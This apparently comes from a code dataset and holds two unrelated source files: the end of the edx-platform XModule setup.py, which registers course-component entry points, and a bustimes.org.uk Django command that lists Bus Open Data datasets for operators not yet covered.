"image = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"error = xmodule.error_module:ErrorDescriptor",
"peergrading = xmodule.peer_grading_module:PeerGradingDescriptor",
"poll_question = xmodule.poll_module:PollDescriptor",
"problem = xmodule.capa_module:CapaDescriptor",
"problemset = xmodule.seq_module:SequenceDescriptor",
"randomize = xmodule.randomize_module:RandomizeDescriptor",
"section = xmodule.backcompat_module:SemanticSectionDescriptor",
"sequential = xmodule.seq_module:SequenceDescriptor",
"slides = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"vertical = xmodule.vertical_module:VerticalDescriptor",
"video = xmodule.video_module:VideoDescriptor",
"videoalpha = xmodule.video_module:VideoDescriptor",
"videodev = xmodule.backcompat_module:TranslateCustomTagDescriptor",
"videosequence = xmodule.seq_module:SequenceDescriptor",
"discussion = xmodule.discussion_module:DiscussionDescriptor",
"course_info = xmodule.html_module:CourseInfoDescriptor",
"static_tab = xmodule.html_module:StaticTabDescriptor",
"custom_tag_template = xmodule.raw_module:RawDescriptor",
"about = xmodule.html_module:AboutDescriptor",
"wrapper = xmodule.wrapper_module:WrapperDescriptor",
"graphical_slider_tool = xmodule.gst_module:GraphicalSliderToolDescriptor",
"annotatable = xmodule.annotatable_module:AnnotatableDescriptor",
"textannotation = xmodule.textannotation_module:TextAnnotationDescriptor",
"videoannotation = xmodule.videoannotation_module:VideoAnnotationDescriptor",
"foldit = xmodule.foldit_module:FolditDescriptor",
"word_cloud = xmodule.word_cloud_module:WordCloudDescriptor",
"hidden = xmodule.hidden_module:HiddenDescriptor",
"raw = xmodule.raw_module:RawDescriptor",
"crowdsource_hinter = xmodule.crowdsource_hinter:CrowdsourceHinterDescriptor",
"lti = xmodule.lti_module:LTIDescriptor",
]
setup(
name="XModule",
version="0.1",
packages=find_packages(exclude=["tests"]),
install_requires=[
'distribute',
'docopt',
'capa',
'path.py',
'webob',
],
package_data={
'xmodule': ['js/module/*'],
},
# See http://guide.python-distribute.org/creation.html#entry-points
# for a description of entry_points
entry_points={
'xblock.v1': XMODULES,
'xmodule.v1': XMODULES,
'console_scripts': [
'xmodule_assets = xmodule.static_content:main',
],
},
)
| pku9104038/edx-platform | common/lib/xmodule/setup.py | Python | agpl-3.0 | 3,169 |
import requests
from django.core.management.base import BaseCommand
from time import sleep
from busstops.models import Service
from .import_transxchange import get_open_data_operators
class Command(BaseCommand):
@staticmethod
def add_arguments(parser):
parser.add_argument('api_key', type=str)
def handle(self, api_key, **options):
assert len(api_key) == 40
open_data_operators, incomplete_operators = get_open_data_operators()
session = requests.Session()
url = 'https://data.bus-data.dft.gov.uk/api/v1/dataset/'
params = {
'api_key': api_key,
'status': ['published', 'expiring'],
'limit': 100
}
while url:
response = session.get(url, params=params)
print(response.url)
data = response.json()
for item in data['results']:
if Service.objects.filter(operator__in=item['noc'], current=True).exists():
continue
if any(noc in open_data_operators for noc in item['noc']):
continue
print(item['name'])
print(' ', item['noc'])
print(' ', item['description'])
print(' ', item['comment'])
print(' ', item['adminAreas'])
print(' ', item['url'])
url = data['next']
params = None
if url:
sleep(1)
| jclgoodwin/bustimes.org.uk | bustimes/management/commands/suggest_bod.py | Python | mpl-2.0 | 1,471 |
Subsets and Splits